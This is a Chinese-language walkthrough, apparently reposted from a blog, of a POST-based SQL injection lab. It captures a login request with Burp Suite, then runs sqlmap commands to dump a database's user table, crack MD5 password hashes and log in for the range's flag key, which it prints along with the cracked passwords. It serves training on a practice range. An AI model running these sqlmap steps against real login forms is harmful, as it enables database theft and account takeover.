POST型SQL注入教学
這次教學(xué)要用到的工具有burpsuite,SQLMAP,瀏覽器
上次我給大家分享的AJE-Windows里面什么工具都有,可以直接裝一個(gè)AJE-Windows工具不用一個(gè)一個(gè)的下,太麻煩
然后這次教學(xué)要用到的SQLMAP模塊參數(shù)給大家說(shuō)一下
–current-db //獲取當(dāng)前使用 的數(shù)據(jù)庫(kù)
–tables 列出指定數(shù)據(jù)庫(kù)中的表
–columns //獲取當(dāng)前數(shù)據(jù)庫(kù)中當(dāng)前表的所有列名
–dump //獲取當(dāng)前數(shù)據(jù)庫(kù)中當(dāng)前表的所有用戶名和密碼
首先我們打開我們的AJE-Windows,再打開SQLMAP和burpsuite
靶場(chǎng)地址是http://219.153.49.228:45888
我們隨便輸入賬號(hào)密碼,然后打開burpsuite開啟攔截包之后點(diǎn)登錄,右鍵把攔截的數(shù)據(jù)包發(fā)送到repeater
右鍵文件復(fù)制到桌面
輸入文件名然后點(diǎn)擊保存
然后輸入sqlmap.py -r 這里寫剛剛保存的數(shù)據(jù)包(拖拽) --current-db回車
好的跑出來(lái)了,這個(gè)站常用的數(shù)據(jù)庫(kù)名是mozhe_Discuz_StormGroup
然后接下來(lái)跑數(shù)據(jù)庫(kù)表名sqlmap.py -r 抓包的文件 -D 該站點(diǎn)用的數(shù)據(jù)庫(kù)名 --tables
跑出來(lái)的表名是StormGroup_member
接下來(lái)跑表內(nèi)字段sqlmap.py -r 數(shù)據(jù)包文件 -D 數(shù)據(jù)庫(kù)名 -T 表名 --columns
跑出來(lái)了表內(nèi)字段name和password,這兩個(gè)分別是用戶名的列名和密碼的列名
接下來(lái)跑用戶名和密碼sqlmap.py -r 數(shù)據(jù)包文件 -D 庫(kù)名 -T 表名 -C name,password --dump
第一個(gè)用戶名是mozhe第二個(gè)也是,第一個(gè)密碼是356f589a7df439f6f744ff19bb8092c0第二個(gè)密碼是
cac346c4e78571439ba96bc5a47c01b6,它用的是MD5加密,第一個(gè)解出來(lái)是dsan13
我們?cè)囋嚨谝粋€(gè)能不能登上去
第一個(gè)登陸失敗了試試第二個(gè),第二個(gè)解出來(lái)密碼是885288
我們登陸試試,登陸成功了,key是mozhe4953564e012470c2374e45919c2
提交key
好的,本次教學(xué)就到這里,喜歡我文章的歡迎點(diǎn)贊加關(guān)注,再訂閱一下我的專欄,或者加入我專欄,有什么地方寫的不好的歡迎加我QQ3516634930反饋
總結(jié)
以上是生活随笔為你收集整理的POST型SQL注入教学的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: JS高级:事件冒泡和事件捕获;
- 下一篇: 【MySQL】redo log ---